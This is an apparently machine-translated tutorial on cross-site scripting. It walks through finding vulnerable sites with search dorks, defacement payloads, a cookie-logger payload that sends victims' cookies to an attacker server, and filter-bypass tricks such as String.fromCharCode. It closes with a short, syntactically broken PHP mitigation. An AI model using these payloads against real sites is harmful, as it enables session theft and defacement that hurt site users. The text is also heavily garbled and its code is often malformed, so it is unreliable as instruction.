XSS Tutorial

Section 1 - Understanding XSS
"CSS", also known as "xss" (confused with Cascading Style Sheets Cross Site Scripting) is an open web applications often encountered. attacker to add malicious code xss recognizes opportunities. many types is possible xss attacks. Now here I stand on the most widely used 3 of them will.
I want to talk about the first round of attacks xss URL. This method will not remain on the page xss means. Xss in this case, just get the code and press "submit" we will try to. How we use our own benefit so that more will be mentioned.

The second attack is in the input field. Where would you add Data Add xss often. As an example, using a search engine, we find a great site. Search box "hacker", and he's started. If a page is loaded class that "hacker" found 100 results for the data displayed on the page will see. The case now or run the code? This attack is not possible to run PHP code in HTML and Javascript code to run, but it is possible. In the meantime, make sure this method will not stay on the server.

Third attack method, this method can be added with the code and the code on the site will be permanent. Running PHP and HTML code have two types that are connected. If we inject the same HTML as if we can inject PHP. This kind of attack is usually blogs and profile. Forums and the most you can add data rather than stay in the area where no data are included. HTML, PHP is very different. HTML on your computer, "download" is it in your browser and solutions (and therefore may view page source). With PHP code, which is hosted on the server script is parsed, then the data is sent back to the browser. PHP injection is extremely rare for this condition. Note: PHP code can never be injected into the HTML page.


Section 2 - Finding XSS Open

To find this open blogs, Forums, Shout boxes, comment boxes and you can start by trying search box. In fact, it is possible to give more examples here, nor mentioned.
Google can be used to more easily find Dorks. As an example, by typing google.com inurl: "search.php? Q =" You can write. Now this is a page that can be found very common and many results can be obtained. Attack to find more go to my other plenty. Also note that most of the site's xss vulnerability and a good eye and a bit to find it in the filter to have information about how to do bypass is enough.

Chapter 3 - Basic Concepts on xss

Now the most commonly used to learn from the most common xss to get started.
The most common one <script>alert("xss")</script>.

This code "xss" without the quotation marks, easily editable tab a "popup" warning will.
Therefore, assuming that you mentioned action Remember return to the previous issue, we search.php? Q = a web site that simply can try on.
=<script> http://site.com/search.php?q alert("xss")</script>

It probably will work, but still does not work, no problem, look at the different sites, although you can experiment with variations. (Too many people, just add HTML is not Javascript aware that they do not think)

<br> <b> <u> http://site.com/search.php?q = xss </ u> </ b>

If the text is written in bold font and news are open if you push on relevance, and now I know that later we will explain methods you can use.

Chapter 4 - Attack Methods

Yes, now how does it work xss learned it, now we can explain some xss Deface methods. There are many methods that can be used to Deface the most effective and most common of them and I'll stand on.

IMG SRC The first one. For who do not know HTML IMG SRC, the official web site link's he used to show the tags.

<html> <body> <IMG src= "http://site.com/yourDefaceIMAGE.png">

Link link with a picture if the current changes, record and will run better understand what I mean.
Now let's say Shout box, Comment box or you've entered your data and confirm, after entering the data that you have found any place showing. Given below have to show picture on the page then I can add a link.
<IMG Src= "http://site.com/yourimage.png">

Do not need them because the page already contains other tags.
This enables your image to appear larger and the site is clearly hacked.
Another method is the use of flash video. The following methods are the same but with a little more different is a way.

<EMBED Src= "http://site.com/xss">
Here, the flash video itself will be executed links.
Pop or routing may be used or
<script> window.open ( "http://www.google.com/" )</script>

Chapter 5 - Cookie (Cookie)

Let cookie in logger's site. Now we obtain the file and upload a.php shaped our files are. Log.txt file to create Do not forget to chmod 777 var. Now in any attack, we can perform, a site which is open xss found. Now add the water code;

window.location = "cookie http://yourserver.co...kielogger.php?c ="+<script>.
or
<srcipt>. location = "cookie http://yourServer.co...kielogger.php?c ="+</script>.

Then if you visit the site if the user will be eaten cookie logger. The required information has been sent to the site and cookies will be stolen. The second part is a more clandestine. Add to your file, and then the user's session cookies for the forward. But if you say that such an attack or the possibility of our site, but only the data shows a time and does not hide it? Let us say that we search.php? Q = I in our hands a page, we use the code below and maybe we can get him a malicious url hex code, and people probably will base64 encode it

=<script>. http://site.com/search.php?q location = "http://yourServer.com/cookielogger.php?c ="+</script> . cookie

Section 6 - Filtering Process to bypass

On most sites, there may seem hungry, but the code does not run, you better make a note of this section to solve. Used to bypass filtering process, some common methods;

') alert (' xss');
or
"); alert ( 'xss');

They are open on a server with this code <script>alert("xss")</script> they do the same thing. Data to confirm before you can try to Hexing or base 64 encoding. Be sure to water issues; xss's to test ( "xss") to use caution at all to do a good method is not practical because of the sites that I block letters xss know.
Other ways to bypass filtering;

<script Type = text / javascript>alert("PlanetCreator")</script>
<script>alert( "PlanetCreator")</script>;
<script>alert( PlanetCreator");</script>
<script>alert( PlanetCreator"/)<script>
There <script> var = 1; alert (var )</script>


Chapter 7 - Advanced Level xss

This section discusses the main methods which I will examine the firm that is used even more of myself I did not find any ways, I'm sure you will like."Magic Signals" is hungry and therefore use some commands I have seen many sites that make unnecessary. However, using fractions, a technique I met them ASCII's turn.

Necessary functions to convert the fractional numbers ASCII's a table containing all
Ascii Table - ASCII character codes and html, octal, hex and decimal chart conversion site can be found. What you want to print this table will help you to write it.

80 108 97 110 101 116 67 114 101 97 116 111 114

Yes, now we get string's decimal values, the things we need to know what function it into Javascript.

String.fromCharCode()

This code is suitable for this kind of thing, installation is easy. We give the following from my own argument.

String.fromCharCode (80 108 97 110 101 116 67 114 101 97 116 111 114)

Yes now
"String.fromCharCode (80 108 97 110 101 116 67 114 101 97 116 111 114)"
"PlanetCreator" expression JAVA (ASCII) are in the tab.

And icons for use with this warning, etc. do not need anything because it already serves as the variable itself.

alert (String.fromCharCode (80 108 97 110 101 116 67 114 101 97 116 111 114))

Now in this case "PlanetCreator" tab will show. And this method is called the magic mark is a number in the bypass cursors.
Before continuing to the next section, again using another method of variables than I would like to talk about.
Let's write something to say;

var myVar = 1
myVar longer a tab of saying here are 1.

To use our own favor xss's variables, we can write as follows;

There <script> myVar = 1; alert (myVar )</script>
Here, the variable contents of any sign (quote) without the use will be displayed.


Chapter 8 - xss safety

This section is intended for web developers. How to prepare the code you can make it I will talk about security.
If found to open script' xss URLs, you secure is very simple. Take a look at the following code to tell;
if (isset ($ _POST [ 'form'])){ echo "<html> <body>". $ _POST [' form ']. "</ body> </ html>"

Let's say that $ _POST [ 'from'] variable, and the leak was coming from any input dialog box have been exposed to xss attack. To ensure the security of the latter method is very simple;

$ charset = 'UTF-8', $ data = htmlentities ($ _POST [ 'form'], ENT_NOQUOTES, $ charset);
if (isset ($ data)) (echo "<html> <body>". $ data. "</ body> </ html>"

This line of code will be possible and all of them Share

Related Articles